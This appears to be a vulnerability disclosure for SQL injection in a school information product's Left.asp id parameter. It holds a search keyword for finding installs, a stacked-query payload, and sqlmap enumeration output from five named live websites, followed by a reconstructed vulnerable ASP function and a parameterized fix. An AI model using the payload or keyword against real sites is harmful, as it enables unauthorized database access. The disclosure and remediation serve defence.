### Summary

boom!!!

### Details

Vendor: 南京苏亚星资讯科技开发有限公司

The vulnerability is in `/SM2005/jiaoshi/InfoSet/Left.asp?id=`. The `id` parameter is not filtered before it reaches the database query, so it is injectable.

Requesting `http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/` directly returns an authorization error page; viewing that page's source is enough to assemble the injection URL.

![111.png](https://images.seebug.org/upload/201411/13091108f5b6000ea1fc1723fd4b7b85fbd630e9.png)

![222.png](https://images.seebug.org/upload/201411/13091145db1b472004905f0032f5d943818830b3.png)

Baidu search keyword: `/SM2005`

Five cases demonstrating that the issue is generic to the product (sqlmap output; the `?` and `\x..` characters are sqlmap's own replacement/garbling of characters it could not render or retrieve cleanly over the time-based channel, and are reproduced as logged):

Case 1: http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0

```text
Place: GET
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:14:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:14:20] [INFO] fetching current user
[09:14:20] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[09:14:20] [INFO] resumed: ?aA
current user:    '?aA'
[09:14:20] [INFO] fetching current database
[09:14:20] [INFO] resumed: yy200?a}
current database:    'yy200?a}'
[09:14:20] [INFO] fetching database names
[09:14:20] [INFO] fetching number of databases
[09:14:20] [INFO] resumed: 14
[09:14:20] [INFO] resumed: aaa
[09:14:20] [INFO] resumed: zupit\x7fr5
[09:14:20] [INFO] resumed: \x7faster
[09:14:20] [INFO] resumed: Merak
[09:14:20] [INFO] resumed: model
[09:14:20] [INFO] resumed: m?db
[09:14:20] [INFO] resumed: North?in?b
[09:14:20] [INFO] resumed: pubs
[09:14:20] [INFO] resumed: S?20g?
[09:14:20] [INFO] resumed: ?
```

Case 2: http://www.zjnksyzx.com:8801/SM2005/jiaoshi/InfoSet/Left.asp?id=0

```text
Place: GET
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:13:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:13:33] [INFO] fetching current user
[09:13:34] [INFO] resumed: saA\x11
current user:    'saA'
[09:13:34] [INFO] fetching current database
[09:13:34] [INFO] resumed: qM2005
current database:    'qM2005'
[09:13:34] [INFO] fetching database names
[09:13:34] [INFO] fetching number of databases
[09:13:34] [INFO] resumed: 13
[09:13:34] [INFO] resumed: qupiter5\x11
[09:13:34] [INFO] resumed: maste}\x7f
[09:13:34] [INFO] resumed: Merak
[09:13:34] [INFO] resumed: model
[09:13:34] [INFO] resumed: msdb
[09:13:34] [INFO] resumed: Northwiyd
[09:13:34] [INFO] resumed: p}bs
[09:13:34] [INFO] resumed: SMa005
[09:13:34] [INFO] resumed: SRP2003
[09:13:34] [INFO] resumed: tempdb
[09:13:34] [INFO] resumed: TempJupiterSa
[09:13:34] [INFO] resumed: Vod2005
[09:13:34] [INFO] resumed: ws2004
available databases [13]:
[*] [maste}]
[*] [p}bs]
[*] [qupiter5]
[*] Merak
[*] model
[*] msdb
[*] Northwiyd
[*] SMa005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] Vod2005
[*] ws2004
[09:13:34] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[09:13:34] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com'
```

Case 3: http://www.lcxyz.com:21245/SM2005/jiaoshi/InfoSet/Left.asp?id=0

```text
Place: GET
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[18:06:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[18:06:43] [INFO] fetching current user
[18:06:43] [INFO] resumed: sa
current user:    'sa'
[18:06:43] [INFO] fetching current database
[18:06:43] [INFO] resumed: SM2005
current database:    'SM2005'
[18:06:43] [INFO] fetching database names
[18:06:43] [INFO] fetching number of databases
[18:06:43] [INFO] resumed: 13
[18:06:43] [INFO] resumed: Jupiter5
[18:06:43] [INFO] resumed: master
[18:06:43] [INFO] resumed: Merak\x03
[18:06:43] [INFO] resumed: mode}q
[18:06:43] [INFO] resumed: msdb
[18:06:43] [INFO] resumed: ReportServe\x7fq
[18:06:43] [INFO] resumed: ReportServerTempDB
[18:06:43] [INFO] resumed: SM2005
[18:06:43] [INFO] resumed: SRP2003
[18:06:43] [INFO] resumed: tempdb
[18:06:43] [INFO] resumed: vc?003
[18:06:43] [INFO] resumed: V}d2005
[18:06:43] [INFO] resumed: ws2004
available databases [13]:
[*] [Merak]
[*] [mode}q]
[*] [ReportServeq]
[*] [vc?003]
[*] [V}d2005]
[*] Jupiter5
[*] master
[*] msdb
[*] ReportServerTempDB
[*] SM2005
[*] SRP2003
[*] tempdb
[*] ws2004
[18:06:43] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[18:06:43] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com'
```

Case 4: http://www.suyaxing.com:81/SM2005/jiaoshi/InfoSet/Left.asp?id=0

```text
Place: GET
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:16:55] [INFO] fetching current user
[09:16:55] [INFO] resumed: sa
current user:    'sa'
[09:16:55] [INFO] fetching current database
[09:16:55] [INFO] resumed: SM2005
current database:    'SM2005'
[09:16:55] [INFO] fetching database names
[09:16:55] [INFO] fetching number of databases
[09:16:55] [INFO] resumed: 23
[09:16:55] [INFO] resumed: Jupiter5
[09:16:55] [INFO] resumed: master
[09:16:55] [INFO] resumed: yerak
[09:16:55] [INFO] resumed: model
[09:16:55] [INFO] resumed: msdb
[09:16:55] [INFO] resumed: Northwind
[09:16:55] [INFO] resumed: pubs
[09:16:55] [INFO] resumed: Sco_CRM
[09:16:55] [INFO] resumed: ScoyCSM
[09:16:55] [INFO] resumed: Sco_Document
[09:16:55] [INFO] resumed: Sco_Financial
[09:16:55] [INFO] resumed: Sco_Inve\x7ftory
[09:16:55] [INFO] resumed: Sco_Personnel
[09:16:55] [INFO] resumed: Sco_Platform
[09:16:55] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[09:16:55] [INFO] resumed: Sco_Por?al
[09:16:55] [INFO] resumed: SM2005
[09:16:55] [INFO] resumed: SRP2003
[09:16:55] [INFO] resumed: tempdb
[09:16:55] [INFO] resumed: TempJupiterSa
[09:16:55] [INFO] resumed: test
[09:16:55] [INFO] resumed: vc2003
[09:16:55] [INFO] resumed: web
[09:16:55] [INFO] resumed: ws2004
available databases [23]:
[*] [Sco_Invetory]
[*] [Sco_Por?al]
[*] Jupiter5
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Sco_CRM
[*] Sco_Document
[*] Sco_Financial
[*] Sco_Personnel
[*] Sco_Platform
[*] ScoyCSM
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] test
[*] vc2003
[*] web
[*] ws2004
[*] yerak
[09:16:55] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com'
```

Case 5: http://www.hwsyxx.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0

```text
Place: GET
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:17:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:17:26] [INFO] fetching current user
[09:17:26] [INFO] resumed: sa
current user:    'sa'
[09:17:26] [INFO] fetching current database
[09:17:26] [INFO] resumed: SM2005
current database:    'SM2005'
[09:17:26] [INFO] fetching database names
[09:17:26] [INFO] fetching number of databases
[09:17:26] [INFO] resumed: 13
[09:17:26] [INFO] resumed: Ju\x7fiter5
[09:17:26] [INFO] resumed: master
[09:17:26] [INFO] resumed: Merak
[09:17:26] [INFO] resumed: model
[09:17:26] [INFO] resumed: msdb
[09:17:26] [INFO] resumed: Northwind
[09:17:26] [INFO] resumed: pubs
[09:17:26] [INFO] resumed: SM2005
[09:17:26] [INFO] resumed: SRP2a03
[09:17:26] [INFO] resumed: tempdb
[09:17:26] [INFO] resumed: vc2003
[09:17:26] [INFO] resumed: Vod2005
[09:17:26] [INFO] resumed: ws2004
available databases [13]:
[*] [Juiter5]
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2a03
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004
[09:17:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[09:17:26] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com'
```

### Proof of Vulnerability

Proven above.
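The page does not include the source of `Left.asp`, so the following is an added reconstruction of the pattern that sqlmap's result implies (the `id` query-string value concatenated into the SQL text of a classic ASP/ADO query against SQL Server), placed next to a hardened version. It is example code written for this page, not the vendor's code; the table and column names (`Teacher`, `TeacherID`, `Name`), the connection string and the function names are assumptions.

```vbscript
<%@ Language="VBScript" %>
<%
Option Explicit

' Added example, not the vendor's Left.asp. Table/column names and the
' connection string are assumptions; the page only shows the URL and the
' id parameter.
Dim connStr
connStr = "Provider=SQLOLEDB;Data Source=.;Initial Catalog=SM2005;Integrated Security=SSPI;"

' --- Vulnerable pattern (the one the sqlmap result implies) ---
' id goes into the SQL string unfiltered, so the request
'   Left.asp?id=0'; WAITFOR DELAY '0:0:5';--
' produces the batch
'   SELECT Name FROM Teacher WHERE TeacherID='0'; WAITFOR DELAY '0:0:5';--'
' SQL Server runs both statements; the 5 s pause is what sqlmap measures
' to confirm the "stacked queries" injection.
Function GetNameVulnerable(id)
    Dim conn, rs
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open connStr
    Set rs = conn.Execute("SELECT Name FROM Teacher WHERE TeacherID='" & id & "'")
    If Not rs.EOF Then GetNameVulnerable = rs("Name") Else GetNameVulnerable = ""
    rs.Close : conn.Close
End Function

' --- Hardened pattern ---
' 1. Accept only a plain decimal integer before touching the database.
' 2. Bind the value as a typed parameter so the driver sends it as data,
'    never as part of the SQL text. With both in place the batch can never
'    contain a second statement.
Function IsPlainInteger(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    IsPlainInteger = re.Test(s)
End Function

Function GetNameSafe(id)
    If Not IsPlainInteger(id) Then
        Response.Status = "400 Bad Request"
        Response.Write "invalid id"
        Response.End
    End If

    Dim conn, cmd, rs
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open connStr
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT Name FROM Teacher WHERE TeacherID = ?"
    cmd.CommandType = 1                      ' adCmdText
    ' adInteger = 3, adParamInput = 1
    cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(id))
    Set rs = cmd.Execute
    If Not rs.EOF Then GetNameSafe = rs("Name") Else GetNameSafe = ""
    rs.Close : conn.Close
End Function

Response.Write Server.HTMLEncode(GetNameSafe(Request.QueryString("id")))
%>
```

Two points from the logs above bear on the fix. First, the injection type is "stacked queries": the `;` in the payload terminates the application's statement and the attacker's statement follows in the same batch, which is why the parameterized query (not quote escaping) is the right repair; a bound `adInteger` parameter is never parsed as SQL. Second, three of the five hosts report `current user: 'sa'`, the SQL Server sysadmin login, so on those installations the injection is a compromise of the whole database server, not just the `SM2005` database; independent of the code fix, the application should connect with a login restricted to the rights its own database needs.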